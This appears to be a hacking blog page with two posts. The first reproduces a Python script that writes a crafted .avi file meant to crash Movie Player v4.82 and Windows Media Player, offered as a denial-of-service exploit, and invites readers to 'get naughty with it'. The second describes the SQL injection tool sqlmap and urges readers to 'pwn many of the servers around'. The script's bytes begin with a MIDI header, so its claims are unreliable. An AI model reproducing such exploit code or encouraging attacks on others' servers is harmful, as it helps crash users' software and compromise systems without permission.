I came across an interesting buffer overflow exploit which exploits the memory vulnerability in Movie Player and 
can also be used successfully against Window Media Player. The exploit can be used to perform a Denial of Service attack and causes the application to crash. For those who don't know about Buffer Overflow, can read the article here.
If run properly, many a times, there is a crash every-time whenever the victim opens the folder in which the Exploit is placed. Here is the exploit coded by ^Xecuti0N3r & d3M0l!tioN3r
#!/usr/bin/python
#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
#(+)Software Link: http://www.movieplay.org/download.php
#(+)Software : Movie Player
#(+)Version : v4.82
#(+)Tested On : WIN-XP SP3
#(+) Date : 31.03.2011
#(+) Hour : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic
print " _______________________________________________________________________";
print "(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit";
print "(+) Software Link: http://www.movieplay.org/download.php";
print "(+) Software : Movie Player";
print "(+) Version : v4.82";
print "(+) Tested On : WIN-XP SP3";
print "(+) Date : 31.03.2011";
print "(+) Hour : 13:37 PM ";
print "____________________________________________________________________\n ";
import time
time.sleep (2);
print "\nGenerating the exploit file !!!";
time.sleep (2);
print "\n\nMoviePlayerExploit.avi file generated!!";
time.sleep (2);
ExploitLocation = "C:\\MoviePlayerExploit.avi"
f = open(ExploitLocation, "wb")
memoryloc ='\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00';
f.write(memoryloc)
f.close()
print "\n\n(+) Done!\n";
print "(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;) \n";
print "(+) Most of the times there is a crash\n whenever you open the folder where the MoviePlayerExploit.avi is stored :D \n";
time.sleep (2);
time.sleep (1);
print "\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r \n";
print "(+)^Xecuti0N3r: E-mail \n";
print "(+)d3M0l!tioN3r: E-mail \n";
print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n";
print "########################################################################\n\n";
time.sleep (4);
You need Python to compile it, once compiled, you can test it in a virtual machine. Try opening it using Window Media Player, it will crash instantly. The more ingenious of you can get naughty with it :)
cheers..
Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web
applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and
apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here: Linux Source: sqlmap-0.7.tar.gz
Windows Portable: sqlmap-0.7_exe.zip
0 comments:
Post a Comment